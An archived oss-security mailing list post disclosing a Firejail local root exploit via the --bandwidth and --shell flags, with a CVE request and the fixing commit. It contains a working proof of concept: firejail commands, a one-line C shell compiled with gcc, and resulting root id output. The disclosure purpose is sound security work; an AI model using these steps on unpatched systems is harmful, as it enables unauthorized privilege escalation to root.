Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sat, 07 Jan 2017 12:13:28 +0100
From: Martin Carpenter <>
Subject: Re: Re: Firejail local root exploit

On Thu, 2017-01-05 at 23:37 +0100, Martin Carpenter wrote:
> A handful of concrete examples that I have reported are below.

Another (new) one: MITRE can you please assign a CVE?

6. Root shell via --bandwidth and --shell

Reported at:

Fixed at:
  commit 5d43fdcd215203868d440ffc42036f5f5ffc89fc
  Author: netblue30 <>
  Date:   Fri Jan 6 22:45:11 2017 -0500

      security fix

Quoting for list:

[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth
flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root)
groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0

Error occurs at

char *arg[4];
arg[0] =;
arg[1] = "-c";
arg[2] = cmd;
arg[3] = NULL;
execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a
bandwidth command.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ